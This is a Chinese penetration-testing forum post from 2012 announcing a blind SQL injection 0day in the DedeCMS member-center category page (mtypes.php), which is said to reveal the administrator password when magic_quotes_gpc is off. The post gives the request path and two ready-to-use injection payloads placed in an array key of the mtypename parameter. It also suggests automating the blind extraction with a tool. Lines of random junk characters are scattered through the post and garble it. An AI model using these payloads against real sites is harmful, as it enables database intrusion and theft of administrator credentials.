中国网络渗透测试联盟
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
[打印本页]
作者:
admin
时间:
2012-12-20 08:08
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊.
- d. K |4 L. c9 u
+ s0 O. E3 ?# x6 J
! J& g2 [7 b% T5 x# C; B
发生在数组key里的注射漏洞,有点意思.
% z% X. J9 z' \ c
1 v- W$ @, y& |% W/ N6 g+ a5 ~$ ?6 y
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
* z1 f* b( V8 n) S
3 D7 x+ E* Q% n& G
http://www.xxx.com
/dede/member/mtypes.php?dopost=save
$ W# @$ j# Q& v
( r; Z- w& o& j5 v# c/ L! r
exploit:
5 e9 M N3 b4 m& N. G1 j
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
/ n2 q5 E- s, q, ?+ ^+ s7 L4 C/ j1 G
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
) u4 N. V' {, f/ H* T) L+ w
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2